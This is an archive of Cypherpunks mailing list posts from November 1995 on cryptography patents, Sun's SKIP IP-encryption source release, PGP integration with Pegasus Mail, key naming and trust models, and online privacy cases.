From s1113645 at tesla.cc.uottawa.ca  Tue Nov 28 14:48:43 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Wed, 29 Nov 1995 06:48:43 +0800
Subject: Archives?
Message-ID: <Pine.3.89.9511281718.C45949-0100000@tesla.cc.uottawa.ca>


On Tue, 28 Nov 1995, Anonymous wrote:

> Is this list archived so that I can try to look stuff up before asking 
> stupid questions?
 
<http://www.hks.net/cpunks/index.html>

You can run lycos searches on its contents.







From smithmi at dev.prodigy.com  Tue Nov 28 14:51:45 1995
From: smithmi at dev.prodigy.com (Michael Smith)
Date: Wed, 29 Nov 1995 06:51:45 +0800
Subject: Elliptic curves, patent status?
Message-ID: <199511282216.RAA17432@tinman.dev.prodigy.com>



I'm unclear about the patent status of elliptic curve 
systems. Are they covered by the Diffie-Hellman patent? 
That is, is the lnguage of this patent broad enough to 
cover _all_ public-key systems, regardless of their 
mathematical basis? 

--Michael Smith
  smithmi at dev.prodigy.com

 






From adam at lighthouse.homeport.org  Tue Nov 28 14:55:03 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Wed, 29 Nov 1995 06:55:03 +0800
Subject: Cypherpunk archives
Message-ID: <199511282224.RAA13088@homeport.org>


>Is this list archived so that I can try to look stuff up before asking 
>stupid questions?

see http://www.hks.net/cpunks/index.html

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From perry at piermont.com  Tue Nov 28 15:43:38 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 29 Nov 1995 07:43:38 +0800
Subject: No Subject
In-Reply-To: <199511282157.QAA10096@bsu-cs.bsu.edu>
Message-ID: <199511282257.RAA00774@jekyll.piermont.com>



Anonymous writes:
> Is this list archived so that I can try to look stuff up before asking 
> stupid questions?

Yes. Check www.hks.net (I think -- maybe its hks.com).

.pm





From mdiehl at dttus.com  Tue Nov 28 15:44:57 1995
From: mdiehl at dttus.com (Martin Diehl)
Date: Wed, 29 Nov 1995 07:44:57 +0800
Subject: Cypherpunks Archives [WAS: no subject]
Message-ID: <9510288176.AA817606611@cc1.dttus.com>


     On November 28, 1995:
     Anonymous <nowhere at bsu-cs.bsu.edu> at Internet-USA
     asked:
     
     > Is this list archived so that I can try to look stuff up before
     > asking stupid questions?
     
     Yes, you can find the archives at:
     
        http://www.hks.net/cpunks/index.html
     
     You should also read:
     
        http://www.oberlin.edu/~brchkind/cyphernomicon/
     
     If you ask, I have another 10-20 URL's related to this subject.
     
     Martin G. Diehl
     






From EALLENSMITH at ocelot.Rutgers.EDU  Tue Nov 28 16:12:29 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Wed, 29 Nov 1995 08:12:29 +0800
Subject: Directed Hamiltonian Path Problem
Message-ID: <01HY6QNMYGP08WYU3C@mbcl.rutgers.edu>


From:	IN%"perry at piermont.com" 28-NOV-1995 02:02:17.85

Indeed. Its the problem with innumeracy. People don't understand that
if, say, a problem is O(2^N), and a problem of size 1000 requires a
liter of fluid, a problem of size 2000 requires 
---------------------------
	Now that I've looked at it a bit more, I would definitely agree...
exponential growth is quite a function. Incidentally, talking about it in
liters of fluid is probably not the best way to look at it, any more than
computer chips can be best defined in square centimeters. But that doesn't
change the essential conclusion; it just alters how big of a problem you
need to use. The lesson here, I believe, is to use as large of a key/etcetera
as possible... something that should be news to none, even to novices like me.
Never assume that something will require too much computing power, until the
computing power needed is not doable in the universe. Then add some, since
(for some problems) someone might figure out a clever way around them. I
worry that factoring may be one of these.
	-Allen





From tcmay at got.net  Tue Nov 28 17:05:29 1995
From: tcmay at got.net (Timothy C. May)
Date: Wed, 29 Nov 1995 09:05:29 +0800
Subject: Directed Hamiltonian Path Problem
Message-ID: <ace0eae109021004d3af@[205.199.118.202]>


At 10:48 PM 11/28/95, E. ALLEN SMITH wrote:
>From:   IN%"perry at piermont.com" 28-NOV-1995 02:02:17.85
>
>Indeed. Its the problem with innumeracy. People don't understand that
>if, say, a problem is O(2^N), and a problem of size 1000 requires a
>liter of fluid, a problem of size 2000 requires
>---------------------------
>        Now that I've looked at it a bit more, I would definitely agree...
>exponential growth is quite a function. Incidentally, talking about it in
>liters of fluid is probably not the best way to look at it, any more than

The reason we speak in terms of physical volumes of "Adleman computers" is
to make concrete the way things scale. If the amount of Adleman computers
needed to factor, say, a 2000-digit modulus (or some reasonably equivalent
Hamiltonian cycle problem, such as the TSP) is "ten Pacific oceans full of
them running for 100 years," then one has a pretty clear feel for just how
futile it is to ask about "But what about if we apply MASSIVE
PARALLELISM?!?!"

(There's a certain well-known person who frequently raises the issue of
"massive parallelism" on sci.crypt, each time revealing that he just
doesn't understand that 1024 or even a million processors will not "solve"
the problem for brute force attacks. Some people think there is something
_magical_ about "massive parallelism.")

>computer chips can be best defined in square centimeters. But that doesn't
>change the essential conclusion; it just alters how big of a problem you
>need to use. The lesson here, I believe, is to use as large of a key/etcetera
>as possible... something that should be news to none, even to novices like me.
>Never assume that something will require too much computing power, until the
>computing power needed is not doable in the universe. Then add some, since
>(for some problems) someone might figure out a clever way around them. I
>worry that factoring may be one of these.

I don't worry much about factoring breakthroughs. And I don't mean minor
improvements, which keep occurring: I mean major breakthroughs which would
make factoring a 2000-decimal-digit number "easy."

Practically speaking, snarfing private keys is a helluva lot easier, for
many reasons.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From rmarquis at umich.edu  Tue Nov 28 17:35:40 1995
From: rmarquis at umich.edu (Robert Marquis, Jr.)
Date: Wed, 29 Nov 1995 09:35:40 +0800
Subject: Illustrations
Message-ID: <v01530500ace1589e54c2@[198.109.36.40]>


Hello.

I was wondering if anyone had any .gifs or .jpgs (on the web I suppose)
which illustrate how encryption works.  Just simple pictures and
illustrations are fine.  Thanks.

-Bob

____________________________________________
 Robert Marquis, Jr.
 University of Michigan - Dearborn

 e-mail: rmarquis at umich.edu
    www: http://www.umd.umich.edu/~rmarquis







From markson at osmosys.incog.com  Tue Nov 28 17:40:01 1995
From: markson at osmosys.incog.com (Tom Markson)
Date: Wed, 29 Nov 1995 09:40:01 +0800
Subject: SKIP Source Release is out!
Message-ID: <9511290122.AA26147@monster.incog.com>



Hi,

Check out http://skip.incog.com.  We've released the source to the SKIP
key management and IP layer encryption package for SunOs 4.x.

Here's a piece of the README file:


	ALPHA 1 Release of SKIP Reference Source for SunOS 4.1.3
	--------------------------------------------------------

SKIP is a Key-management protocol for IP based protocols.  It is an 
acronym for Simple Key-management for Internet Protocols. SKIP is 
documented in the SKIP IETF IPSEC draft included in this directory 
as draft-ietf-ipsec-skip-05.txt.  The most recent SKIP draft is 
always available at http://skip.incog.com and the Internet-Drafts
directories.

>From this public domain source release, you can build a fully 
functional IP-layer encryption package which supports DES and 
Triple-DES for SunOS 4.1.3.  This means that every IP networked 
application can have it's network traffic encrypted.   Unlike
application level encryption packages, this package encrypts 
IP packets.  Thus, applications do not need to be recompiled or 
modified to take advantage of encryption.

The SKIP source is possible through the efforts of engineers in Sun
Microsystems Internet Commerce Group.  The developers and designers
are Ashar Aziz, Tom Markson, Martin Patterson, Hemma Prafullchandra and
Joseph Reveane.  Linda Cavanaugh worked on the documentation.

The package compiles under both the SunPro compiler and GCC.  We expect 
that this release should port without too much pain to any operating 
system which uses BSD style networking (mbufs).  

A legal warning: Because this package contains strong encryption, the
Software must not be transferred to persons who are not US citizens or
permanent residents of the US, or exported outside the US (except
Canada) in any form (including by electronic transmission) without
prior written approval from the US Government. Non-compliance with
these restrictions constitutes a violation of the U.S. Export Control
Laws.

This source release may be used for both commercial and noncommercial 
purposes, subject to the restrictions described in the software and
patent license statements.  

Furthermore, Sun Microsystems has licensed the Stanford public key patents 
from Cylink Corp. which are available to users of this package on a royalty 
free basis. The patent statement is in README.PATENT.  Be sure to read this,
as it contains some restrictions and other important information.  

Also included in this release is a high speed Big Number package written 
by Colin Plumb. bnlib/legal.c contains Colin's software license statement. 

Features
--------
	1.  SKIP V2 compliant implementation using ESP encapsulation.
	2.  Support for DES/3DES for traffic and key encryption.
	3.  Diffie-Hellman Public Key Agreement based system.
	4.  Full Support for manual establishment of master keys.
	5.  Support for multiple NSIDs and multiple local certificates.
	6.  GUI tool for user friendly manipulation of access control lists
	    and key statistics.
	7.  Command line tools for manipulating access control lists, etc.
	8.  Implementation of the Certificate Discovery protocol fully
	    integrated into SKIP.
	9   Implementation of X.509 public key certificates.
	10. Implementation of DSA signature algorithm for certificate
	    signatures.
	11. Implementation for MD2, MD5 and SHA message digest algorithms.
	12. Implementation of ASN.1 DER encoding/decoding.
	13. SunScreen(tm) SKIP compatibility mode.
	14. Implementation of hashed public keys as defined in the SKIP 
	    draft.  Implementation of programs to generate hashed public
	    keys.
	15. Certificate utilities to convert X.509 Certificates to hashed
	    keys and  print both X.509 and Hashed certificates.
	16. High performance Big Number library for Diffie-Hellman 
	    calculations.
	17. Implementation is effectively "public domain" and may be used both 
	    commercially and non-commercially.
	18. Patent Agreement with Cylink allows roylaty-free use of the 
            Diffie-Hellman and other Stanford patents with this package for 
	    commercial and non-commercial use.  Read README.PATENT for 
	    some restrictions.
	19. Inclusion of prime generation program used to generate the 
	    primes in SKIP draft.






From habs at warwick.com  Tue Nov 28 17:52:58 1995
From: habs at warwick.com (Harry S. Hawk)
Date: Wed, 29 Nov 1995 09:52:58 +0800
Subject: Certificate Authorities?
In-Reply-To: <30BBB178.267A@netscape.com>
Message-ID: <199511290139.UAA02214@cmyk.warwick.com>




> We are looking at adding the ability for enterprise security
> administrators to lock various parts of the Navigator configuration
> so that the user can not change them, including stuff relating
> to trust and certificates.  This functionality will not be in
> 2.0, but we do consider it important for certain customers.

As a Cypberpunk, a reporter and a corporate user of java/hot
java/netscape not only should you do that but have a way of locking in
various class libs..  E.g.  if I want to change the security class
(but don't want my users to do so..) there needs to be a way.. THat
SHOULD be in 2.0.

/hawk

Harry Hawk,     Manager of Interactive Communications
                Warwick Baker & Fiore,  212 941 4438,     habs at warwick.com

The Internet has the potential to set us free -- to learn anything and
do anything, whenever we want. No wonder politicians want to regulate
it -- The Washington Post, November 7, 1995, p. A13., Cyber Liberation
[Column], James K. Glassman





From nobody at REPLAY.COM  Tue Nov 28 18:47:12 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Wed, 29 Nov 1995 10:47:12 +0800
Subject: PGP hooks for Pegasus Mail?
Message-ID: <199511290230.DAA13064@utopia.hacktic.nl>


----- wake-up rant ON -----

On 28 Nov 95 at 12:16, Lynne L. Harrison wrote:

> At 09:52 AM 11/28/95 +0000, you wrote:
> >Anyone done anything regarding PGP hooks into Pegasus Mail? 
> >I'm running it at home now (SLIPped into my Linux box), and 
> >I'd like to find a way to integrate PGP into Pegasus Mail.
> >
> >Thanks in advance for any replies...
> 
> Ed -
> 
>   I haven't heard of anything re: "PGP hooks into Pegasus 
> Mail".  At one time, Eudora and ViaCrypt were discussing it 
> but, from what I heard, those discussions fizzled out.

>   The easiest way to *integrate* is to use a front end program.

I find it bizarre that what little is going on in real integration of PGP for e-mail users is not mentioned on cp, perhaps unknown, certainly not of interest to those who should be interested.

What is going on is going on with respect to Pegasus, and what mention of it there is is not on cp but on the Pegasus Mail list.

Apparently cypherpunks *don't* write code, and PMail people *do*.

Do a million registered users and an e-mail program with hooks already originating outside the U.S. penetrate anyone's consciousness?

----- wake-up rant OFF -----





 ------------ http://www.phoenix.net/~tjunker ------------
| Your freedom is on the auction block.  What do you bid? |
 ---------------------------------------------------------
Unofficial Wang VS Information Center





From stevenw at best.com  Tue Nov 28 18:50:04 1995
From: stevenw at best.com (Steven Weller)
Date: Wed, 29 Nov 1995 10:50:04 +0800
Subject: RISKS: Informed public opinion of automatic toll collection
Message-ID: <v0153050bace1773216cf@[206.86.1.35]>



Anonymity and privacy interest:

------------------------------

Date: Tue, 21 Nov 1995 15:07:48 -0800 (PST)
From: Phil Agre <pagre at weber.ucsd.edu>
Subject: Resistance to intelligent traffic

Public resistance to electronic road-use taxes is continually to grow
worldwide.  Most recently, a panel of 14 laymen assembled by Teknologi
Naevnet (i.e., The Danish Board of Technology, Antonigade 4, DK-1106,
Denmark, +45 33 32 05 03 -- see report number 5/1995), having been presented
with arguments pro and con concerning "intelligent traffic" technologies,
concluded that it "does not see any substantial economic, environmental or
safety benefits from massive public investments in traffic informatics --
perhaps with the exception of public transport".  On the issue of safety,
for example, they accepted that some likely safety benefits existed, but
that they had to be weighed against other potential dangers, for example
that drivers' skills may deteriorate due to reliance on automation, and in
any event they concluded that if safety should be improved then much more
cost-effective measures were available anyway.  They also raised concerns
about privacy and emphasized that new legislation would have to regulate the
new databases that such systems would accumulate.

The report fits an emerging global pattern.  When electronic road tolls and
other forms of high technology that entail surveillance of citizens'
movements are implemented quietly, creating a fait accompli, citizens tend
to accept them fatalistically.  But when any sort of democratic procedure is
employed, public resistance is very stiff indeed.  This phenomenon suggests
two possible scenarios for the future:

 (1) Continued stealth implementation, leading to deepening public distrust
     of information technology and the organizations that control it.

 (2) Genuine public involvement in the social choices being made about
     "intelligent" roadway technologies, leading to legitimate decisions
     based on full public debate, and potentially as well to technological
     improvements (such as the use of digital cash and other technologies
     of anonymity) that deliver a broad range of functionality while
     responding appropriately to legitimate public concerns.

Which scenario occurs will depend on the political culture of each country.
More concretely, it will depend on the degree to which people are informed
about the issues, express their concerns, and ensure that the more legitimate
course is taken.

Phil Agre, UCSD

-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw at best.com                   |       -- Time Magazine, 3 July 1995







From habs at warwick.com  Tue Nov 28 19:20:12 1995
From: habs at warwick.com (Harry S. Hawk)
Date: Wed, 29 Nov 1995 11:20:12 +0800
Subject: Certificate Authorities?
In-Reply-To: <30BBC98D.3BD3@netscape.com>
Message-ID: <199511290257.VAA00761@cmyk.warwick.com>


>   This is all stuff we are looking at.  It will not be in 2.0 though.
> There is a lot of functionality in 2.0 that should not have to wait
> for this.

Will knowledgable corporate users be able to change the Security Class
in 2.0 ?




-- 
Harry Hawk,     Manager of Interactive Communications
                Warwick Baker & Fiore,  212 941 4438,     habs at warwick.com

The Internet has the potential to set us free -- to learn anything and
do anything, whenever we want. No wonder politicians want to regulate
it -- The Washington Post, November 7, 1995, p. A13., Cyber Liberation
[Column], James K. Glassman





From ahupp at primenet.com  Tue Nov 28 19:28:34 1995
From: ahupp at primenet.com (Adam Hupp)
Date: Wed, 29 Nov 1995 11:28:34 +0800
Subject: key for Alice as promised (not)
Message-ID: <199511290315.UAA26439@usr4.primenet.com>


>Can you imagine??  I'm simply not willing to fool myself into thinking 
>that I ahve security by posting a key and using PGP.

Unless you can post some proof that PGP is insecure, stop insisting it is.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQBtAzCNppQAAAEDALhWZl7IuGZ9zZT5bACo0b/1L0Nv0C72vKHIO3IHh+cwpHHa
2Ozb9aeO0UvXGwkkZIYgUm0EvmzKh7yb1GTLvBp5kXpR3I9w+Yj4LGlBDERpUWw6
x4ED49pwDnz1Hl5FBQAFEbQYYXNoIDxhaHVwcEBwcmltZW5ldC5jb20+
=PtJK
-----END PGP PUBLIC KEY BLOCK-----






From ahupp at primenet.com  Tue Nov 28 19:46:29 1995
From: ahupp at primenet.com (Adam Hupp)
Date: Wed, 29 Nov 1995 11:46:29 +0800
Subject: spooky URL
Message-ID: <199511290334.UAA21094@usr5.primenet.com>


I visisted their web page and what they do is record how many hits your page
gets.
I checked out their business partners page and it's no one I have ever heard
of.  Still, its kind of spooky because unless you notice the Netscape status
line thing you don't know you're being counted.  I imagine it is all put in
a big database and sold to advertisers, ect.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQBtAzCNppQAAAEDALhWZl7IuGZ9zZT5bACo0b/1L0Nv0C72vKHIO3IHh+cwpHHa
2Ozb9aeO0UvXGwkkZIYgUm0EvmzKh7yb1GTLvBp5kXpR3I9w+Yj4LGlBDERpUWw6
x4ED49pwDnz1Hl5FBQAFEbQYYXNoIDxhaHVwcEBwcmltZW5ldC5jb20+
=PtJK
-----END PGP PUBLIC KEY BLOCK-----






From anonymous-remailer at shell.portal.com  Tue Nov 28 21:21:18 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Wed, 29 Nov 1995 13:21:18 +0800
Subject: key for Alice as promised (not)
Message-ID: <199511290507.VAA10591@jobe.shell.portal.com>


On Tue, 28 Nov 1995, Adam Hupp wrote:

> >Can you imagine??  I'm simply not willing to fool myself into thinking 
> >that I ahve security by posting a key and using PGP.
> 
> Unless you can post some proof that PGP is insecure, stop insisting it is.

PGP is really not the issue.  The issue is more my security and the
environment that I use PGP in.  I don't have a trusted machine to run PGP
on.  Anyone who wants to can come up to machine and copy my secret keyring
or they can even watch me typing my password in. 

So, I don't fool myself, and I don't use PGP, except for things like
exchanging a one-time pad with someone when I've already sent the message
out across another delivery mechanism, like on a floppy delivered my
courier. 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From jlavelle at mpx.com.au  Tue Nov 28 22:37:02 1995
From: jlavelle at mpx.com.au (J Lavelle)
Date: Wed, 29 Nov 1995 14:37:02 +0800
Subject: mailing list
Message-ID: <m0tKfsB-0006LNC@kyoko.mpx.com.au>


can you put me down on the list, as i have a keen interest in the 
subject.
           Thanx.....







From jhupp at novellnet.gensys.com  Tue Nov 28 23:03:44 1995
From: jhupp at novellnet.gensys.com (Jeff Hupp)
Date: Wed, 29 Nov 1995 15:03:44 +0800
Subject: PGP hooks for Pegasus Mail?
Message-ID: <23FDF9E10F5@Novellnet.Gensys.com>


On 29 Nov 95 at 3:30, Anonymous wrote:

: ----- wake-up rant ON -----
: 
: On 28 Nov 95 at 12:16, Lynne L. Harrison wrote:
: 
: > At 09:52 AM 11/28/95 +0000, you wrote:
: > >Anyone done anything regarding PGP hooks into Pegasus Mail? 
: > >I'm running it at home now (SLIPped into my Linux box), and 
: > >I'd like to find a way to integrate PGP into Pegasus Mail.
: > >
: > >Thanks in advance for any replies...
: > 
: > Ed -
: > 
: >   I haven't heard of anything re: "PGP hooks into Pegasus 
: > Mail".  At one time, Eudora and ViaCrypt were discussing it 
: > but, from what I heard, those discussions fizzled out.
: 
: >   The easiest way to *integrate* is to use a front end program.
: 
: I find it bizarre that what little is going on in real integration of PGP for
: e-mail users is not mentioned on cp, perhaps unknown, certainly not of interest
: to those who should be interested.
: 
[clip]
: 
: Do a million registered users and an e-mail program with hooks already
: originating outside the U.S. penetrate anyone's consciousness?
: 
: ----- wake-up rant OFF -----

-----BEGIN PGP SIGNED MESSAGE-----

 This really should be cross posted to 'the future will be easy to use'
too.

 I subscribed to the cypherpunks list specificly to see what was going
on with Pegasus / PGP now that David Harris has put his promised hooks
into V. 2.2

 For those who don't know, Pegasus is available for DOS, Windows, and
the MAC.  The windows version (and if history is any guide, shortly the
MAC and DOS version will) has hooks for user definable encryption,
decryption, signing, and signiture verificaiton.

 Distrabution lists, an address book that can include aliases and a
picture can be associated with an alias as well as user defined notes. 
Mail filtering rules.  It's Freeware.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMLvRIDUjeCeeebC9AQGZ1Af+My08sWzjDEMP92VQOfMICQADXSYy+xz2
bnXpkRHug/JI5WHl7jyyfl50acqd/cFjMwJntGXsuxlf2K09TO/s82CANMeOY1L0
6AAQ6iKkFgV/Mc+wc2YNFaTTrTibRU9c71NpjbbguTw4nYkq4a4LZMVK6cZEhn+X
XothGceLaNTRFVxoCeG8v2IT7Iy/GQikpOWfQtoFtmuuEohHU45DUgvwQJD61+/4
rsDJ0/rwyw/IK4yO+WRpNz+xHFYcCyLVpvRY9iEJ+K2AjwD49yWp6ml6GBfqkGf2
yqDYP7z6+0QCgueFxrOi3sSH6m+BZFtaNg7G9WVxmcA8FpL0jP2APA==
=kumC
-----END PGP SIGNATURE-----
-- 
JHupp at gensys.com           |For PGP Public Key:
http://gensys.com          |finger jhupp at gensys.com
All cats are not gray after midnight.  Endless variety--






From jamesd at echeque.com  Tue Nov 28 23:14:47 1995
From: jamesd at echeque.com (James A. Donald)
Date: Wed, 29 Nov 1995 15:14:47 +0800
Subject: The future will be easy to use
Message-ID: <199511290659.WAA19886@blob.best.net>


At 01:03 PM 11/28/95 EST, Carl Ellison wrote:
>That's true.  What the user would have to see is some icon (or, for
>text-bound folks, a temporary unique string) until the user chooses and
>assigns the appropriate alias.  That icon would have no meaning by itself.
>It would acquire a meaning by being associated with some message or set of
>messages:

Better method:  Creator of the key names it:  Usually after himself or
his role:  The recipients key database detects and resolves cases 
where two different keys have identical names in accordance with
certification rules.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From jamesd at echeque.com  Tue Nov 28 23:21:52 1995
From: jamesd at echeque.com (James A. Donald)
Date: Wed, 29 Nov 1995 15:21:52 +0800
Subject: The future will be easy to use
Message-ID: <199511290707.XAA24211@blob.best.net>


At 03:30 PM 11/28/95 EST, Carl Ellison wrote:
> Of course.  This isn't the base case.  We would have some keys which I sign
> based on my own personal knowledge; things handed to me by people I know;
> some possibly published in the paper where the real key owner would see the
> claim and be able to contest it.

You are making the same erroneous assumption that Phil made when he
designed the Web of trust:  You assume that it is important and 
interesting to link key ID's to physical bodies.  This is usually
not the case:  Linking key ID's to home web pages etc is not only 
easier -- it is also usually more interesting and important.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From futplex at pseudonym.com  Tue Nov 28 23:46:58 1995
From: futplex at pseudonym.com (Futplex)
Date: Wed, 29 Nov 1995 15:46:58 +0800
Subject: GOST for sale
In-Reply-To: <Pine.HPP.3.91.951124033807.19699B-100000@cor.sos.sll.se>
Message-ID: <199511290728.CAA01862@thor.cs.umass.edu>


Mats writes:
> JETICO INC., located in Finland (Tammerfors), introduced
> a new crypto system on the world market last week. It's 
> based on GOST, the Russian federal standard algorithm.
> This product, called BestCrypt, is implemented at least
> partly in hardware. Alledgedly it uses 'GOST 28147-89',
> whatever that stands for.

A DejaNews search for "BestCrypt" turned up an announcement by
Sergey Frolov in comp.security.misc
on November 14th. According to him, it implements GOST, single DES, and IDEA.
They have DOS and Windows versions. He says [big sic for this quote]:

	All algorithm available simultaneosly - you may change
	algorithm for your data easy - it's look like to change the password...

	I have non-commercial demo version of the product (370 Kb arjed 
	distributive) and I can send it to people who will be interested in it.

-Futplex <futplex at pseudonym.com>





From cactus at hks.net  Wed Nov 29 00:59:16 1995
From: cactus at hks.net (Leslie Todd Masco)
Date: Wed, 29 Nov 1995 16:59:16 +0800
Subject: Untitled
Message-ID: <199511290849.DAA08036@bb.hks.net>


-----BEGIN PGP SIGNED MESSAGE-----

In article <199511282257.RAA00774 at jekyll.piermont.com>,
Perry E. Metzger <perry at piermont.com> wrote:
>
>Anonymous writes:
>> Is this list archived so that I can try to look stuff up before asking 
>> stupid questions?
>
>Yes. Check www.hks.net (I think -- maybe its hks.com).

http://www.hks.net/cpunks/index.html

It's (still!) in flux, though and hasn't quite gotten those useful
search functions yet.  I'd flame the maintainer, but...
- -- 
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus at hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMLwesCoZzwIn1bdtAQHStAF+I0PlsickMkTsVFcbLPMMRPsvap+yD2gR
etQjdnAivni4EzlDH+++XfxX+VpkmX8o
=DhdR
-----END PGP SIGNATURE-----





From rschlafly at attmail.com  Wed Nov 29 01:07:13 1995
From: rschlafly at attmail.com (Roger  Schlafly)
Date: Wed, 29 Nov 1995 17:07:13 +0800
Subject: PKP patent hearing
Message-ID: <rschlafly3330854090>



Hearing on the validity of the public key patents
=================================================

On Wed., Dec. 6, 1995, 10:00 am, San Jose Federal Bldg, there will
be a hearing on the validity of the Diffie-Hellman, Hellman-Merkle,
RSA, and Schnorr patents.

There are also some annoying procedural technicalities that are
also scheduled to be heard, so we may not get to the patents
right away.  (antitrust standing, sufficiency of pleadings,
admissibility of evidence, etc.)

Details:
Schlafly v. Public Key Partners & RSA Data Security
Case C-94-20512 SW PVT
Hon. Spencer Williams
At the San Jose federal building, 280 S First St.
Ask the US Marshals where Williams' courtroom is while you go thru
the airport-style security.
Court Clerk: 408/535-5364

The Federal Bldg is in downtown San Jose, between 101, 880, and 280.
I will take 280 to SJ, go north on 87, right on the first exit, and
park in the first convenient lot or garage.  There is some street
parking, but the SJ meter maids are very efficient.  If you come
from the north, you may want to take 87 or the Almaden Expwy.  (I get
those mixed up.)

The judge is used to lawyers wearing suits, so try to wear something
that won't appear disrespectful.

Roger Schlafly

phone: 408-476-3550
CompuServe: 76646,323
US Mail: PO Box 1680, Soquel, CA 95073 USA
Internet: rschlafly at attmail.com





From attila at primenet.com  Wed Nov 29 01:44:04 1995
From: attila at primenet.com (attila)
Date: Wed, 29 Nov 1995 17:44:04 +0800
Subject: The future will be easy to use
In-Reply-To: <199511281801.NAA00386@jekyll.piermont.com>
Message-ID: <Pine.BSD.3.91.951129093109.12710F-100000@usr1.primenet.com>



   what about the Sun release announced today? --it is fully functional
with DES and 3xDES, DH negotiation, etc. and is coded for either sun 4.1.3
or gcc compilers?  Check out http://skip.incog.com.  source to the SKIP
key management and IP layer encryption package for SunOs 4.x. 

On Tue, 28 Nov 1995, Perry E. Metzger wrote:

> 
> Jonathan Zamick writes:
> > This discussion was based on a group of people getting together to create
> > a new easy to use package for handling keys and such. The government is
> > going to try to take a dominant stance, and mandate elements of it.
> 
> So we can ignore tem. Big deal. They have no laws with which to
> enforce their desires.
> 
> > However, it is possible, even in an antagonistic relationship, to develop
> > positive feedback.
> 
> Who cares? An hour spent talking to an idiot from Washington is better
> spent writing good code unless there is a law pending in congress, in
> which case you are probably better off paying someone who knows what
> they are doing to do the talking for you.
> 
> > Returning to the original topic though, do we want to get a smaller list
> > together to spec out some ideas for the project that was discussed? A
> > simple, transparent, tool which would allow people to use strong encryption
> > without having to think about it?
> 
> You mean, like IPSEC/Photuris? I'll be running IPSEC (but sadly not
> Photuris, although I'll be trying to port Aggelos Keromytis' version
> at some point) on my laptop at the IETF meeting in Dallas (provided
> that I can buy a laptop in time.)
> 
> There are three things we are currently missing in the architecture,
> IMHO.
> 
> 1) We need a certificate system to replace X.509 and that plays nicely
>    with distributed databases.
> 2) We need to implement the Eastlake/Kaufman method for embedding
>    certificates in the DNS or something similar.
> 3) We need a good entity naming model.
> 
> Given all those being implemented, sometime soon I can see people
> telnetting or ftping hither and thither without ever noticing or
> caring that their sessions are completely encrypted.
> 
> We also have the following need:
> 
> 4) A good MIME mailer (that looks like NeXT Mail or something like it)
>    which has hooks for something MOSSlike that uses the same
>    certificate infrastructure described in 1-3 above.
> 5) SHTTP capable browsers that also use 1-3 listed above.
> 
> .pm
> 






From shamrock at netcom.com  Wed Nov 29 02:37:56 1995
From: shamrock at netcom.com (Lucky Green)
Date: Wed, 29 Nov 1995 18:37:56 +0800
Subject: (fwd) Like FV with Crypto ... 'Cept Different ...
Message-ID: <v02120d02ace15be5c8a1@[192.0.2.1]>


Robert forwarded some propaganda on yet another Internet payment system:

>  WebTrader can be used as a stand-alone Internet application or in
>conjunction with SBT's Pro Series 3.0i accounting software.  WebTrader has a
>suggested retail price of $1,295.
                  ^^^^^^^^^^^^^^^^

They can't be serious. Why would you want to pay $1,300 for a payment
system, when you can get an Ecash merchant account for a fraction of what
Checkfree is charging?


<Insert disclaimer.h>


-- Lucky Green <mailto:shamrock at netcom.com>
   PGP encrypted mail preferred.







From jcobb at ahcbsd1.ovnet.com  Wed Nov 29 06:07:43 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Wed, 29 Nov 1995 22:07:43 +0800
Subject: No Privacy Right in US ?
Message-ID: <Pine.BSD.3.91.951129085026.5117L-100000@ahcbsd1.ovnet.com>


 
 
Friend, 
 
 
Edupage, 28 November 1995, reports: 
 
             ONLINE ANONYMITY IS ALL RELATIVE 

America Online has revealed the real name of a subscriber 
who called herself "Jenny TRR" to a Caribbean resort owner 
and dive instructor who claim they were defamed in remarks 
she posted on an AOL bulletin board. 
 
AOL gave the subscriber a chance to object to the action, but 
says she didn't attempt to fight the subpoena.  AOL's assis- 
tant general counsel says the service doesn't disclose infor- 
mation about electronic mail, which is protected by the Elec- 
tronic Communications Privacy Act, 
 
         unless it [ electronic mail ] is part of 
                a criminal investigation. 
 
The item cites: Wall Street Journal 24 Nov 95 B1. 
 
 
There's two types of criminal investigations: those of crimes 
and those that are crimes. 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE: 
 
     To subscribe to Edupage send a message to: 
 
                    listproc at educom.unc.edu 
 
     and in the body of the message type: 
 
                  subscribe edupage Joe Louis 
 
(assuming that your name is Joe Louis; if it's not, substitute 
